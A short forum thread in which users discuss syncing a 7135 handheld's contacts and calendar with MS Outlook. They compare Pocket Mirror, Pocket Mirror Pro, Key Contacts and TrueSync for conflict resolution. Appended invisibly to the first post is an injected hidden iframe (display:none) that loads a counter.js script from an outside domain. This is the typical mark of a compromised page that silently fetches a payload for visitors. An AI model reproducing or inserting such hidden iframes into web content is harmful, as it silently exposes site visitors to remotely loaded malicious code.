+ Reply to Thread

Syncing with MS Outlook

Does the 7135 come with PocketMirror or any other program to sync contacts with MS Outlook? What is the best program to use for syncing with Outlook?

Thanks,
    Mike<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It comes with Pocket Mirror.

Yup, it comes with Pocket Mirror - but I'm not thrilled with Pocket Mirror so far. Nothing wrong with it, I'm just used to having more control over conflict resolution. Anyone have a recommendation of a better conduit for Outlook contacts and calendar?

Nope. It works great for me.
    ~'kito
    pdaPhoneHome Moderator

I use Key Contacts by Chapura. They are the company that makes Pocket Mirror. It is great. If you don't want to switch to a different program. You should upgrade to Pocket Mirror Professional. It allows complete control.

Good Luck,
    Chris Mattix
    Personal Real Estate Consultant

Thanks! With your encouragement, mattixc, I searched further and found that Pocket Mirror Pro does have the feature I'm looking for specifically:
    <Conflicts can be resolved when the same item has been modified on both the handheld and in Outlook.>

'kito - I would say that Pocket Mirror works great for me too - it's just that I don't want to resolve conflicts by getting duplicates and having to go figure out the diffs by hand.

TrueSync always was my friend-- had it syncing between my old Rex, my 6035, outlook, and a fourth manager at one point, with good conflict resolution.